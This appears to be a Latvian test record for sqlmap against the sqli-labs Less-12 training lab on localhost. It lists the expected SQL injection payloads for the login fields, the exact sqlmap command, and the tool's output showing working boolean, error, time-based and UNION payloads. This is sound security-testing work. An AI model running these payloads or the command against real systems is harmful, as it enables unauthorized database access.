=================================================================================
1. Īpašība: savādāka vienas un tās pašas vājības variācija (piemēra sqli-labs11) - apakšesošais vaicājums sastāv nevis no pēdiņām ', bet gan no pēdiņām un iekavām ")
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: uname=test") OR 1=1-- -&passwd=test
3.2. error-based: uname=test")&passwd=test
3.3. time-based: uname=test") OR Sleep(1)-- -&passwd=test
3.4. union: uname=test") union select 1,2-- -&passwd=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 4606227 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost/sqli-labs/sqli-labs/Less-12/" -p uname,passwd --data="uname=test&passwd=test" -risk=3 --level=5

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. POST parameter 'uname' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.3. POST parameter 'passwd' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
7.4. there were multiple injection points, please select the one to use for following injections: 0 (0 nozīmē = parameter: username)
=================================================================================
sqlmap identified the following injection point(s) with a total of 877 HTTP(s) requests:
---
Parameter: passwd (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: uname=test&passwd=-4139") OR 1229=1229 AND ("YKiU"="YKiU

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test&passwd=test") AND GTID_SUBSET(CONCAT(0x716a767071,(SELECT (ELT(3486=3486,1))),0x71717a6b71),3486) AND ("yYpV"="yYpV

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test&passwd=test") AND (SELECT 6964 FROM (SELECT(SLEEP(5)))fQHT) AND ("wbgL"="wbgL

Parameter: uname (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: uname=test") AND 8834=(SELECT (CASE WHEN (8834=8834) THEN 8834 ELSE (SELECT 5260 UNION SELECT 4915) END))-- -&passwd=test

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uname=test") AND GTID_SUBSET(CONCAT(0x716a767071,(SELECT (ELT(8858=8858,1))),0x71717a6b71),8858) AND ("kDrS"="kDrS&passwd=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uname=test") AND (SELECT 5005 FROM (SELECT(SLEEP(5)))BPxY) AND ("hBGA"="hBGA&passwd=test

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: uname=test") UNION ALL SELECT CONCAT(0x716a767071,0x766f6965426378517a4a545357714e43426647644f61696c486c7472776a47686556506f71757a4f,0x71717a6b71),NULL-- -&passwd=test
---
web application technology: PHP 5.6.40, Apache 2.4.38
back-end DBMS: MySQL >= 5.6
